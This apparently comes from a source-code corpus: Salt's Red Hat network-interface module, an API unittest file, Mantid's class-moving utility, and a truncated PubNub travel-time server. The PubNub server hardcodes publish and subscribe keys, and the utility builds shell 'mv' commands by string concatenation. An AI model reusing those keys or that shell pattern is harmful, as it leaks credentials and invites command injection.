'use_carrier' in opts: if opts['use_carrier'] in _CONFIG_TRUE: bond.update({'use_carrier': '1'}) elif opts['use_carrier'] in _CONFIG_FALSE: bond.update({'use_carrier': '0'}) else: valid = _CONFIG_TRUE + _CONFIG_FALSE _raise_error_iface(iface, 'use_carrier', valid) else: _log_default_iface(iface, 'use_carrier', bond_def['use_carrier']) bond.update({'use_carrier': bond_def['use_carrier']}) return bond def _parse_settings_bond_4(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond4. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '4'} for binding in ['miimon', 'downdelay', 'updelay', 'lacp_rate', 'ad_select']: if binding in opts: if binding == 'lacp_rate': if opts[binding] == 'fast': opts.update({binding: '1'}) if opts[binding] == 'slow': opts.update({binding: '0'}) valid = ['fast', '1', 'slow', '0'] else: valid = ['integer'] try: int(opts[binding]) bond.update({binding: opts[binding]}) except Exception: _raise_error_iface(iface, binding, valid) else: _log_default_iface(iface, binding, bond_def[binding]) bond.update({binding: bond_def[binding]}) if 'use_carrier' in opts: if opts['use_carrier'] in _CONFIG_TRUE: bond.update({'use_carrier': '1'}) elif opts['use_carrier'] in _CONFIG_FALSE: bond.update({'use_carrier': '0'}) else: valid = _CONFIG_TRUE + _CONFIG_FALSE _raise_error_iface(iface, 'use_carrier', valid) else: _log_default_iface(iface, 'use_carrier', bond_def['use_carrier']) bond.update({'use_carrier': bond_def['use_carrier']}) if 'hashing-algorithm' in opts: valid = ['layer2', 'layer2+3', 'layer3+4'] if opts['hashing-algorithm'] in valid: bond.update({'xmit_hash_policy': opts['hashing-algorithm']}) else: _raise_error_iface(iface, 'hashing-algorithm', valid) return bond def _parse_settings_bond_5(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond5. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '5'} for binding in ['miimon', 'downdelay', 'updelay']: if binding in opts: try: int(opts[binding]) bond.update({binding: opts[binding]}) except Exception: _raise_error_iface(iface, binding, ['integer']) else: _log_default_iface(iface, binding, bond_def[binding]) bond.update({binding: bond_def[binding]}) if 'use_carrier' in opts: if opts['use_carrier'] in _CONFIG_TRUE: bond.update({'use_carrier': '1'}) elif opts['use_carrier'] in _CONFIG_FALSE: bond.update({'use_carrier': '0'}) else: valid = _CONFIG_TRUE + _CONFIG_FALSE _raise_error_iface(iface, 'use_carrier', valid) else: _log_default_iface(iface, 'use_carrier', bond_def['use_carrier']) bond.update({'use_carrier': bond_def['use_carrier']}) return bond def _parse_settings_bond_6(opts, iface, bond_def): ''' Filters given options and outputs valid settings for bond6. If an option has a value that is not expected, this function will log what the Interface, Setting and what it was expecting. ''' bond = {'mode': '6'} for binding in ['miimon', 'downdelay', 'updelay']: if binding in opts: try: int(opts[binding]) bond.update({binding: opts[binding]}) except Exception: _raise_error_iface(iface, binding, ['integer']) else: _log_default_iface(iface, binding, bond_def[binding]) bond.update({binding: bond_def[binding]}) if 'use_carrier' in opts: if opts['use_carrier'] in _CONFIG_TRUE: bond.update({'use_carrier': '1'}) elif opts['use_carrier'] in _CONFIG_FALSE: bond.update({'use_carrier': '0'}) else: valid = _CONFIG_TRUE + _CONFIG_FALSE _raise_error_iface(iface, 'use_carrier', valid) else: _log_default_iface(iface, 'use_carrier', bond_def['use_carrier']) bond.update({'use_carrier': bond_def['use_carrier']}) return bond def _parse_settings_eth(opts, iface_type, enabled, iface): ''' Filters given options and outputs valid settings for a network interface. ''' result = {'name': iface} if 'proto' in opts: valid = ['none', 'bootp', 'dhcp'] if opts['proto'] in valid: result['proto'] = opts['proto'] else: _raise_error_iface(iface, opts['proto'], valid) if 'dns' in opts: result['dns'] = opts['dns'] result['peerdns'] = 'yes' if 'mtu' in opts: try: result['mtu'] = int(opts['mtu']) except ValueError: _raise_error_iface(iface, 'mtu', ['integer']) if iface_type not in ['bridge']: ethtool = _parse_ethtool_opts(opts, iface) if ethtool: result['ethtool'] = ethtool if iface_type == 'slave': result['proto'] = 'none' if iface_type == 'bond': bonding = _parse_settings_bond(opts, iface) if bonding: result['bonding'] = bonding if iface_type not in ['bond', 'vlan', 'bridge', 'ipip']: if 'addr' in opts: if salt.utils.validate.net.mac(opts['addr']): result['addr'] = opts['addr'] else: _raise_error_iface(iface, opts['addr'], ['AA:BB:CC:DD:EE:FF']) else: # If interface type is slave for bond, not setting hwaddr if iface_type != 'slave': ifaces = __salt__['network.interfaces']() if iface in ifaces and 'hwaddr' in ifaces[iface]: result['addr'] = ifaces[iface]['hwaddr'] if iface_type == 'bridge': result['devtype'] = 'Bridge' bypassfirewall = True valid = _CONFIG_TRUE + _CONFIG_FALSE for opt in ['bypassfirewall']: if opt in opts: if opts[opt] in _CONFIG_TRUE: bypassfirewall = True elif opts[opt] in _CONFIG_FALSE: bypassfirewall = False else: _raise_error_iface(iface, opts[opt], valid) if bypassfirewall: __salt__['sysctl.persist']('net.bridge.bridge-nf-call-ip6tables', '0') __salt__['sysctl.persist']('net.bridge.bridge-nf-call-iptables', '0') __salt__['sysctl.persist']('net.bridge.bridge-nf-call-arptables', '0') else: __salt__['sysctl.persist']('net.bridge.bridge-nf-call-ip6tables', '1') __salt__['sysctl.persist']('net.bridge.bridge-nf-call-iptables', '1') __salt__['sysctl.persist']('net.bridge.bridge-nf-call-arptables', '1') else: if 'bridge' in opts: result['bridge'] = opts['bridge'] if iface_type == 'ipip': result['devtype'] = 'IPIP' for opt in ['my_inner_ipaddr', 'my_outer_ipaddr']: if opt not in opts: _raise_error_iface(iface, opts[opt], ['1.2.3.4']) else: result[opt] = opts[opt] if iface_type == 'ib': result['devtype'] = 'InfiniBand' for opt in ['ipaddr', 'master', 'netmask', 'srcaddr', 'delay', 'domain', 'gateway', 'zone']: if opt in opts: result[opt] = opts[opt] for opt in ['ipv6addr', 'ipv6gateway']: if opt in opts: result[opt] = opts[opt] for opt in ['ipaddrs', 'ipv6addrs']: if opt in opts: result[opt] = opts[opt] if 'ipv6_autoconf' in opts: result['ipv6_autoconf'] = opts['ipv6_autoconf'] if 'enable_ipv6' in opts: result['enable_ipv6'] = opts['enable_ipv6'] valid = _CONFIG_TRUE + _CONFIG_FALSE for opt in ['onparent', 'peerdns', 'peerntp', 'slave', 'vlan', 'defroute', 'stp']: if opt in opts: if opts[opt] in _CONFIG_TRUE: result[opt] = 'yes' elif opts[opt] in _CONFIG_FALSE: result[opt] = 'no' else: _raise_error_iface(iface, opts[opt], valid) if 'onboot' in opts: log.warning( 'The \'onboot\' option is controlled by the \'enabled\' option. ' 'Interface: {0} Enabled: {1}'.format(iface, enabled) ) if enabled: result['onboot'] = 'yes' else: result['onboot'] = 'no' # If the interface is defined then we want to always take # control away from non-root users; unless the administrator # wants to allow non-root users to control the device. if 'userctl' in opts: if opts['userctl'] in _CONFIG_TRUE: result['userctl'] = 'yes' elif opts['userctl'] in _CONFIG_FALSE: result['userctl'] = 'no' else: _raise_error_iface(iface, opts['userctl'], valid) else: result['userctl'] = 'no' # This vlan is in opts, and should be only used in range interface # will affect jinja template for interface generating if 'vlan' in opts: if opts['vlan'] in _CONFIG_TRUE: result['vlan'] = 'yes' elif opts['vlan'] in _CONFIG_FALSE: result['vlan'] = 'no' else: _raise_error_iface(iface, opts['vlan'], valid) if 'arpcheck' in opts: if opts['arpcheck'] in _CONFIG_FALSE: result['arpcheck'] = 'no' if 'ipaddr_start' in opts: result['ipaddr_start'] = opts['ipaddr_start'] if 'ipaddr_end' in opts: result['ipaddr_end'] = opts['ipaddr_end'] if 'clonenum_start' in opts: result['clonenum_start'] = opts['clonenum_start'] return result def _parse_routes(iface, opts): ''' Filters given options and outputs valid settings for the route settings file. ''' # Normalize keys opts = dict((k.lower(), v) for (k, v) in six.iteritems(opts)) result = {} if 'routes' not in opts: _raise_error_routes(iface, 'routes', 'List of routes') for opt in opts: result[opt] = opts[opt] return result def _parse_network_settings(opts, current): ''' Filters given options and outputs valid settings for the global network settings file. ''' # Normalize keys opts = dict((k.lower(), v) for (k, v) in six.iteritems(opts)) current = dict((k.lower(), v) for (k, v) in six.iteritems(current)) result = {} valid = _CONFIG_TRUE + _CONFIG_FALSE if 'enabled' not in opts: try: opts['networking'] = current['networking'] _log_default_network('networking', current['networking']) except ValueError: _raise_error_network('networking', valid) else: opts['networking'] = opts['enabled'] if opts['networking'] in valid: if opts['networking'] in _CONFIG_TRUE: result['networking'] = 'yes' elif opts['networking'] in _CONFIG_FALSE: result['networking'] = 'no' else: _raise_error_network('networking', valid) if 'hostname' not in opts: try: opts['hostname'] = current['hostname'] _log_default_network('hostname', current['hostname']) except Exception: _raise_error_network('hostname', ['server1.example.com']) if opts['hostname']: result['hostname'] = opts['hostname'] else: _raise_error_network('hostname', ['server1.example.com']) if 'nozeroconf' in opts: if opts['nozeroconf'] in valid: if opts['nozeroconf'] in _CONFIG_TRUE: result['nozeroconf'] = 'true' elif opts['nozeroconf'] in _CONFIG_FALSE: result['nozeroconf'] = 'false' else: _raise_error_network('nozeroconf', valid) for opt in opts: if opt not in ['networking', 'hostname', 'nozeroconf']: result[opt] = opts[opt] return result def _raise_error_iface(iface, option, expected): ''' Log and raise an error with a logical formatted message. ''' msg = _error_msg_iface(iface, option, expected) log.error(msg) raise AttributeError(msg) def _raise_error_network(option, expected): ''' Log and raise an error with a logical formatted message. ''' msg = _error_msg_network(option, expected) log.error(msg) raise AttributeError(msg) def _raise_error_routes(iface, option, expected): ''' Log and raise an error with a logical formatted message. ''' msg = _error_msg_routes(iface, option, expected) log.error(msg) raise AttributeError(msg) def _read_file(path): ''' Reads and returns the contents of a file ''' try: with salt.utils.fopen(path, 'rb') as contents: # without newlines character. http://stackoverflow.com/questions/12330522/reading-a-file-without-newlines lines = contents.read().splitlines() try: lines.remove('') except ValueError: pass return lines except Exception: return [] # Return empty list for type consistency def _write_file_iface(iface, data, folder, pattern): ''' Writes a file to disk ''' filename = os.path.join(folder, pattern.format(iface)) if not os.path.exists(folder): msg = '{0} cannot be written. {1} does not exist' msg = msg.format(filename, folder) log.error(msg) raise AttributeError(msg) fout = salt.utils.fopen(filename, 'w') fout.write(data) fout.close() def _write_file_network(data, filename): ''' Writes a file to disk ''' fout = salt.utils.fopen(filename, 'w') fout.write(data) fout.close() def _read_temp(data): lines = data.splitlines() try: # Discard newlines if they exist lines.remove('') except ValueError: pass return lines def build_bond(iface, **settings): ''' Create a bond script in /etc/modprobe.d with the passed settings and load the bonding kernel module. CLI Example: .. code-block:: bash salt '*' ip.build_bond bond0 mode=balance-alb ''' rh_major = __grains__['osrelease'][:1] opts = _parse_settings_bond(settings, iface) try: template = JINJA.get_template('conf.jinja') except jinja2.exceptions.TemplateNotFound: log.error('Could not load template conf.jinja') return '' data = template.render({'name': iface, 'bonding': opts}) _write_file_iface(iface, data, _RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface)) path = os.path.join(_RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface)) if rh_major == '5': __salt__['cmd.run']( 'sed -i -e "/^alias\\s{0}.*/d" /etc/modprobe.conf'.format(iface), python_shell=False ) __salt__['cmd.run']( 'sed -i -e "/^options\\s{0}.*/d" /etc/modprobe.conf'.format(iface), python_shell=False ) __salt__['file.append']('/etc/modprobe.conf', path) __salt__['kmod.load']('bonding') if settings['test']: return _read_temp(data) return _read_file(path) def build_interface(iface, iface_type, enabled, **settings): ''' Build an interface script for a network interface. CLI Example: .. code-block:: bash salt '*' ip.build_interface eth0 eth <settings> ''' if __grains__['os'] == 'Fedora': rh_major = '6' else: rh_major = __grains__['osrelease'][:1] iface = iface.lower() iface_type = iface_type.lower() if iface_type not in _IFACE_TYPES: _raise_error_iface(iface, iface_type, _IFACE_TYPES) if iface_type == 'slave': settings['slave'] = 'yes' if 'master' not in settings: msg = 'master is a required setting for slave interfaces' log.error(msg) raise AttributeError(msg) if iface_type == 'vlan': settings['vlan'] = 'yes' if iface_type == 'bridge': __salt__['pkg.install']('bridge-utils') if iface_type in ['eth', 'bond', 'bridge', 'slave', 'vlan', 'ipip', 'ib']: opts = _parse_settings_eth(settings, iface_type, enabled, iface) try: template = JINJA.get_template('rh{0}_eth.jinja'.format(rh_major)) except jinja2.exceptions.TemplateNotFound: log.error( 'Could not load template rh{0}_eth.jinja'.format( rh_major ) ) return '' ifcfg = template.render(opts) if 'test' in settings and settings['test']: return _read_temp(ifcfg) _write_file_iface(iface, ifcfg, _RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}') path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}'.format(iface)) return _read_file(path) def build_routes(iface, **settings): ''' Build a route script for a network interface. CLI Example: .. code-block:: bash salt '*' ip.build_routes eth0 <settings> ''' template = 'rh6_route_eth.jinja' if __grains__['osrelease'][0] < 6: template = 'route_eth.jinja' log.debug('Template name: ' + template) iface = iface.lower() opts = _parse_routes(iface, settings) log.debug("Opts: \n {0}".format(opts)) try: template = JINJA.get_template(template) except jinja2.exceptions.TemplateNotFound: log.error( 'Could not load template {0}'.format(template) ) return '' opts6 = [] opts4 = [] for route in opts['routes']: ipaddr = route['ipaddr'] if salt.utils.validate.net.ipv6_addr(ipaddr): opts6.append(route) else: opts4.append(route) log.debug("IPv4 routes:\n{0}".format(opts4)) log.debug("IPv6 routes:\n{0}".format(opts6)) routecfg = template.render(routes=opts4) routecfg6 = template.render(routes=opts6) if settings['test']: routes = _read_temp(routecfg) routes.extend(_read_temp(routecfg6)) return routes _write_file_iface(iface, routecfg, _RH_NETWORK_SCRIPT_DIR, 'route-{0}') _write_file_iface(iface, routecfg6, _RH_NETWORK_SCRIPT_DIR, 'route6-{0}') path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route-{0}'.format(iface)) path6 = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route6-{0}'.format(iface)) routes = _read_file(path) routes.extend(_read_file(path6)) return routes def down(iface, iface_type): ''' Shutdown a network interface CLI Example: .. code-block:: bash salt '*' ip.down eth0 ''' # Slave devices are controlled by the master. if iface_type not in ['slave']: return __salt__['cmd.run']('ifdown {0}'.format(iface)) return None def get_bond(iface): ''' Return the content of a bond script CLI Example: .. code-block:: bash salt '*' ip.get_bond bond0 ''' path = os.path.join(_RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface)) return _read_file(path) def get_interface(iface): ''' Return the contents of an interface script CLI Example: .. code-block:: bash salt '*' ip.get_interface eth0 ''' path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}'.format(iface)) return _read_file(path) def up(iface, iface_type): # pylint: disable=C0103 ''' Start up a network interface CLI Example: .. code-block:: bash salt '*' ip.up eth0 ''' # Slave devices are controlled by the master. if iface_type not in ['slave']: return __salt__['cmd.run']('ifup {0}'.format(iface)) return None def get_routes(iface): ''' Return the contents of the interface routes script. CLI Example: .. code-block:: bash salt '*' ip.get_routes eth0 ''' path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route-{0}'.format(iface)) path6 = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route6-{0}'.format(iface)) routes = _read_file(path) routes.extend(_read_file(path6)) return routes def get_network_settings(): ''' Return the contents of the global network script. CLI Example: .. code-block:: bash salt '*' ip.get_network_settings ''' return _read_file(_RH_NETWORK_FILE) def apply_network_settings(**settings): ''' Apply global network configuration. CLI Example: .. code-block:: bash salt '*' ip.apply_network_settings ''' if 'require_reboot' not in settings: settings['require_reboot'] = False if 'apply_hostname' not in settings: settings['apply_hostname'] = False hostname_res = True if settings['apply_hostname'] in _CONFIG_TRUE: if 'hostname' in settings: hostname_res = __salt__['network.mod_hostname'](settings['hostname']) else: log.warning( 'The network state sls is trying to apply hostname ' 'changes but no hostname is defined.' ) hostname_res = False res = True if settings['require_reboot'] in _CONFIG_TRUE: log.warning( 'The network state sls is requiring a reboot of the system to ' 'properly apply network configuration.' ) res = True else: res = __salt__['service.restart']('network') return hostname_res and res def build_network_settings(**settings): ''' Build the global network script. CLI Example: .. code-block:: bash salt '*' ip.build_network_settings <settings> ''' # Read current configuration and store default values current_network_settings = _parse_rh_config(_RH_NETWORK_FILE) # Build settings opts = _parse_network_settings(settings, current_network_settings) try: template = JINJA.get_template('network.jinja') except jinja2.exceptions.TemplateNotFound: log.error('Could not load template network.jinja') return '' network = template.render(opts) if settings['test']: return _read_temp(network) # Write settings _write_file_network(network, _RH_NETWORK_FILE) return _read_file(_RH_NETWORK_FILE)
smallyear/linuxLearn
salt/salt/modules/rh_ip.py
Python
apache-2.0
36,314
import argparse import unittest import os from api.api import Resource #argument parsing parser = argparse.ArgumentParser(description='MOO Technical Test - Code Test Two.', epilog="Support Contact: justin.albertyn@gmail.com") parser.add_argument('-v, --verbose', dest='verbose', action='store_true') args = parser.parse_args() class APITester(unittest.TestCase): def test_list_attributes_about_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: Get​ ​a​ ​list​ ​of​ ​the​ ​following​ ​attributes​ ​about​ ​ a​ ​user * Name * Username * Email * Phone * Website """ users = Resource("users") attribute_dict = users.get_attr_list_by_id("1",["name", "username", "email", "phone", "website"]) rhs = sorted(list(attribute_dict.keys())) lhs = sorted(["name", "username", "email", "phone", "website"]) self.assertEqual(rhs, lhs) def test_retrieve_invalid_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: Get​ ​a​ ​404​ ​status​ ​code​ ​when​ ​retrieving​ ​the​ ​ details​ ​of​ ​an​ ​invalid​ ​user """ users = Resource("users") user_object = users.get_by_id("10000") rhs = user_object["response_code"] lhs = 404 self.assertEqual(rhs, lhs) def test_retrieve_valid_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: Get​ ​a​ ​200​ ​status​ ​code​ ​when​ ​retrieving​ ​the​ ​ details​ ​of​ ​a​ ​valid​ ​user """ users = Resource("users") user_object = users.get_by_id("1") rhs = user_object["response_code"] lhs = 200 self.assertEqual(rhs, lhs) def test_create_new_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: Create​ ​a​ ​new​ ​user """ users = Resource("users") new_user = {'id': 10, 'name': 'Justin Albertyn', 'username': 'Jay', 'email': 'justin.albertyn@gmail.com', 'address': { 'street': 'Diasy Lane', 'suite': '30', 'city': 'London', 'zipcode': 'EC10 1FW', 'geo': {'lat': '-37.3159', 'lng': '81.1496'} }, 'phone': '1-770-736-8031 x56442', 'website': 'hildegard.org', 'company': {'name': 'Madiba.tech', 'catchPhrase': 'Happy Technology', 'bs': 'We are technology' } } rhs = users.create(new_user) lhs = 201 self.assertEqual(rhs, lhs) def test_delete_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: Delete​ ​a​ ​user """ users = Resource("users") rhs = users.delete("1") lhs = 200 self.assertEqual(rhs, lhs) def test_get_header_attr_list_for_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: See​ ​the​ ​following​ ​fields​ ​in​ ​the​ ​header​ ​of​ ​a​ ​response​ ​when​ ​getting​ ​a​ ​list​ ​of​ ​users: * Cache-Control​ ​=>​ ​public * Connection​ ​=>​ ​keep-alive * Content-Type​ ​=>​ ​application/json """ users = Resource("users") attribute_dict = users.get_header_attr_list_for_resource(["Connection","Cache-Control","Content-Type"]) rhs = sorted(list(attribute_dict.keys())) lhs = sorted(["Connection","Cache-Control","Content-Type"]) self.assertEqual(rhs, lhs) def test_update_valid_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: edit/update a users details, expecting a succesful (200) HTTP response. """ users = Resource("users") update_user = {'username': 'Jay'} rhs = users.update('1', update_user) lhs = 200 self.assertEqual(rhs, lhs) def test_update_invalid_user(self): """ As​ ​a​ ​client​ ​of​ ​this​ ​API,​ ​I​ ​want​ ​to​ ​be​ ​able​ ​to: recieve an HTTP response 404 (not found) when attempting to edit/update a user that does not exist. """ users = Resource("users") update_user = {'username': 'Jay'} rhs = users.update('1000', update_user) lhs = 404 self.assertEqual(rhs, lhs) if __name__ == "__main__": unittest.main()
justin-albertyn/moo
api_tester.py
Python
mit
5,745
#!/usr/bin/env python # Mantid Repository : https://github.com/mantidproject/mantid # # Copyright &copy; 2018 ISIS Rutherford Appleton Laboratory UKRI, # NScD Oak Ridge National Laboratory, European Spallation Source # & Institut Laue - Langevin # SPDX - License - Identifier: GPL - 3.0 + """ Utility for moving a class file to a different project.""" from __future__ import (absolute_import, division, print_function, unicode_literals) import argparse import datetime import os import re import sys from cmakelists_utils import * #====================================================================== def move_one(subproject, classname, newproject, newclassname, oldfilename, newfilename, args): """Move one file """ # Move the file try: cmd = "mv " + oldfilename + " " + newfilename cmd = cmd.replace("\\","/") if not args.no_vcs: cmd = "git " + cmd print("Running:", cmd) retval = os.system(cmd) if retval != 0: raise RuntimeError("Error executing cmd '{}'".format(cmd)) f = open(newfilename, 'r') text = f.read() f.close() # Replace any includes of it text = text.replace("Mantid" + subproject + "/" + args.source_subfolder + classname + ".h", "Mantid" + newproject + "/" + args.dest_subfolder + newclassname + ".h") #Replace the guard old_guard = "MANTID_{}_{}_H_".format(subproject.upper(), classname.upper()) new_guard = "MANTID_{}_{}_H_".format(newproject.upper(), newclassname.upper()) text = text.replace(old_guard, new_guard) # Replace the namespace declaration text = text.replace("namespace " + subproject, "namespace " + newproject) # Replace the contents f = open(newfilename, 'w') f.write(text) except RuntimeError as err: print(err) #====================================================================== def move_all(subproject, classname, newproject, newclassname, args): # Directory at base of subproject basedir, header_folder = find_basedir(args.project, subproject) newbasedir, new_header_folder = find_basedir(args.project, newproject) headerfile = os.path.join(basedir, "inc/" + header_folder + "/" + args.source_subfolder + classname + ".h") sourcefile = os.path.join(basedir, "src/" + args.source_subfolder + classname + ".cpp") testfile = os.path.join(basedir, "test/" + classname + "Test.h") newheaderfile = os.path.join(newbasedir, "inc/" + new_header_folder + "/" + args.dest_subfolder + newclassname + ".h") newsourcefile = os.path.join(newbasedir, "src/" + args.dest_subfolder + newclassname + ".cpp") newtestfile = os.path.join(newbasedir, "test/" + args.dest_subfolder + newclassname + "Test.h") if args.header and not overwrite and os.path.exists(newheaderfile): print("\nError! Header file {} already exists. Use --force to overwrite.\n".format(newheaderfile)) return if args.cpp and not overwrite and os.path.exists(newsourcefile): print("\nError! Source file {} already exists. Use --force to overwrite.\n".format(newsourcefile)) return if args.test and not overwrite and os.path.exists(newtestfile): print("\nError! Test file {} already exists. Use --force to overwrite.\n".format(newtestfile)) return print() if args.header: move_one(subproject, classname, newproject, newclassname, headerfile, newheaderfile, args) if args.cpp: move_one(subproject, classname, newproject, newclassname, sourcefile, newsourcefile, args) if args.test: move_one(subproject, classname, newproject, newclassname, testfile, newtestfile, args) # Insert into the cmake list remove_from_cmake(subproject, classname, args, args.source_subfolder) add_to_cmake(newproject, newclassname, args, args.dest_subfolder) print(" Files were removed to Framework/{}/CMakeLists.txt !".format(subproject)) print(" Files were added to Framework/{}/CMakeLists.txt !".format(newproject)) print() #====================================================================== if __name__ == "__main__": parser = argparse.ArgumentParser(description='Utility to move a Mantid class from one project to another. ' 'Please note, you may still have more fixes to do to get compilation!') parser.add_argument('subproject', metavar='SUBPROJECT', type=str, help='The subproject under Framework/; e.g. Kernel') parser.add_argument('classname', metavar='CLASSNAME', type=str, help='Name of the class to move') parser.add_argument('newproject', metavar='NEWPROJECT', type=str, help='Name of the project to which to move the class.') parser.add_argument('newclassname', metavar='NEWCLASSNAME', type=str, help='Name of the new class.') parser.add_argument('--force', dest='force', action='store_const', const=True, default=False, help='Force overwriting existing files. Use with caution!') parser.add_argument('--no-vcs', dest='no_vcs', action='store_const',const=True, default=False, help='Can be used to move a class that is not yet under version control. Default: False') parser.add_argument('--no-header', dest='header', action='store_const', const=False, default=True, help="Don't move the header file") parser.add_argument('--no-test', dest='test', action='store_const', const=False, default=True, help="Don't move the test file") parser.add_argument('--no-cpp', dest='cpp', action='store_const', const=False, default=True, help="Don't move the cpp file") parser.add_argument('--source-subfolder', dest='source_subfolder', default="", help='The source is in a subfolder below the main part of the project, e.g. Geometry/Instrument.') parser.add_argument('--dest-subfolder', dest='dest_subfolder', default="", help='The destination is in a subfolder below the main part of the project, e.g. Geometry/Instrument.') parser.add_argument('--project', dest='project', default="Framework", help='The project in which this goes. Default: Framework. Can be MantidQt, Vates') args = parser.parse_args() subproject = args.subproject newproject = args.newproject classname = args.classname newclassname = args.newclassname overwrite = args.force # Make sure the subfolders end with a / if args.source_subfolder != "": if args.source_subfolder[-1:] != "/": args.source_subfolder += "/" if args.dest_subfolder != "": if args.dest_subfolder[-1:] != "/": args.dest_subfolder += "/" move_all(subproject, classname, newproject, newclassname, args)
mganeva/mantid
buildconfig/move_class.py
Python
gpl-3.0
7,196
import pymongo from pymongo import MongoClient import datetime import pytz import math import time import datetime from pubnub import Pubnub import threading import logging pub_key ='pub-c-f2fc0469-ad0f-4756-be0c-e003d1392d43' sub_key ='sub-c-4d48a9d8-1c1b-11e6-9327-02ee2ddab7fe' LOG_FILENAME = 'TTO_serverlogs.log' logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,format='%(asctime)s, %(levelname)s, %(message)s', datefmt='%Y-%m-%d %H:%M:%S') g_minit = 10 g_sleepTime = 580 g_divCompare = 3 # Dictionaries and Lists to store the Data client_data = {} beforeJourneyClientList = {} startedJourneyClientList = {} commonClientIDList = [] commonStartedClientIDList = [] zone_ttimedct = {"NEWARK-EDISON":["US/Eastern",1719],"BROOKLYN-DENVILLE":["US/Eastern",2921],"MOUNTZION RADIOLOGY CENTER-SF GENERAL HOSPITAL":["US/Pacific",767]} '''**************************************************************************************** Function Name : publish_handler (pubnub operation) Description : Function used to publish the data to the client Parameters : channel - UUID of the client result - The result i.e., The dictionary contains recommendations or alerts ****************************************************************************************''' def publish_handler(channel,result): try: if (client_data[channel]['recommndsentproceed'] == True): pbtry = 0 while (pbtry<3): try: pbreturn = pubnub.publish(channel = channel ,message =result,error=error) if (pbreturn[0] == 1): return None elif(pbreturn[0] == 0): logging.error("The publish return error %s for the client %s\n"%(pbreturn[1],channel)) pbtry+=1 else: pass except Exception as error_pdhandler: logging.error("The error_pdhandler Exception is %s,%s\n"%(error_pdhandler,type(error_pdhandler))) pbtry+=1 else: pass except Exception as pubhandlerError: logging.error("The publish function Exception is %s,%s,%s\n"%(pubhandlerError,type(pubhandlerError),str(result))) '''**************************************************************************************** Function Name : alertpublish_handler (pubnub operation) Description : Function used to publish the data to the client Parameters : channel - UUID of the client result - The result i.e., The dictionary contains recommendations or alerts ****************************************************************************************''' def alertpublish_handler(channel,result): try: if (client_data[channel]['alertsentproceed'] == True): pbtry = 0 while (pbtry<3): try: pbreturn = pubnub.publish(channel = channel ,message =result,error=error) if (pbreturn[0] == 1): client_data[channel].update({"alertsentproceed":False}) return None elif(pbreturn[0] == 0): logging.error("The publish return error %s for the client %s\n"%(pbreturn[1],channel)) pbtry+=1 else: pass except Exception as error_pdhandler: logging.error("The alerterror_pdhandler Exception is %s,%s\n"%(error_pdhandler,type(error_pdhandler))) pbtry+=1 else: pass except Exception as alertpubhandlerError: logging.error("The alertpublish function Exception is %s,%s,%s\n"%(alertpubhandlerError,type(alertpubhandlerError),str(result))) '''**************************************************************************************** Function Name : recommendationAlgoFunc (Algorithm operation) Description : Function used to do the Algorithm Parameters : DesiredArrivalTime - client's Desired ArrivalTime to the Destination clientID - client's UUID ****************************************************************************************''' def recommendationAlgoFunc(DesiredArrivalTime,clientID): try: global newttobackground proceed = False dateproceed = False route_time = datetime.datetime.now(pytz.timezone(client_data[clientID]['timeZone'])) theorytimeinsecs = client_data[clientID]['theoryTime'] # TheoriticalTravelDuration(TTD) TheoriticalTravelDuration = theorytimeinsecs/60.0 #Theory time in minutes # ILLUSTRATION STEP 1 --> Round Off TTD to nearest 10min time interval by introducing offset if (TheoriticalTravelDuration%10 >= 5): # OFFSET VALUE rem = 10.0-TheoriticalTravelDuration%10 else: rem = TheoriticalTravelDuration%10 # OFFSET VALUE rem = -rem TimeDurationOffset = rem #(TDO) Limit = 1 # All the mongolab operations are inside the try exception block try: # This is to get the latest date in the mongodb dateCursor = newttobackground.ttobgcoll.find({"route":client_data[clientID]['routeName']}).sort('recorddate', pymongo.DESCENDING).limit(Limit) for datedoc in dateCursor: endDate = datedoc['recorddate'] dateproceed = True except Exception as e: dateproceed = False result = {"responseType":4,"message":"oops!! Internal problem"} publish_handler(clientID,result) logging.error("The dateCursor error is %s,%s\n"%(e,type(e))) if dateproceed == True: diff = DesiredArrivalTime-route_time day = diff.days hour = (day*24 + diff.seconds/3600) realtimeinminutes = [] time = [] # ILLUSTRATION STEP 2 --> Fetch 12hr advance prediction for the Selected Route try: #This is to get the predictions from the result collection cursor = newttobackground.ttoresultcoll.find({"route":client_data[clientID]['routeName']}).sort('time', pymongo.ASCENDING).limit(150) if (0<=hour <= 12 and 0<=day<=1): proceed = True for datadoc in cursor: time.append(datadoc['time'].replace(second=0)) realtimeinminutes.append(datadoc['predictioninmins']) else: if day < 0: result = {"responseType":4,"message":"Desired Arrival Time is below 12 hours range"} else: result = {"responseType":4,"message":"Desired Arrival Time is more than 12 hours away"} publish_handler(clientID,result) proceed = False del client_data[clientID] except Exception as e: logging.error("The testdatacursor error is %s,%s\n"%(e,type(e))) proceed = False result = {"responseType":4,"message":"oops!! Internal problem"} publish_handler(clientID,result) 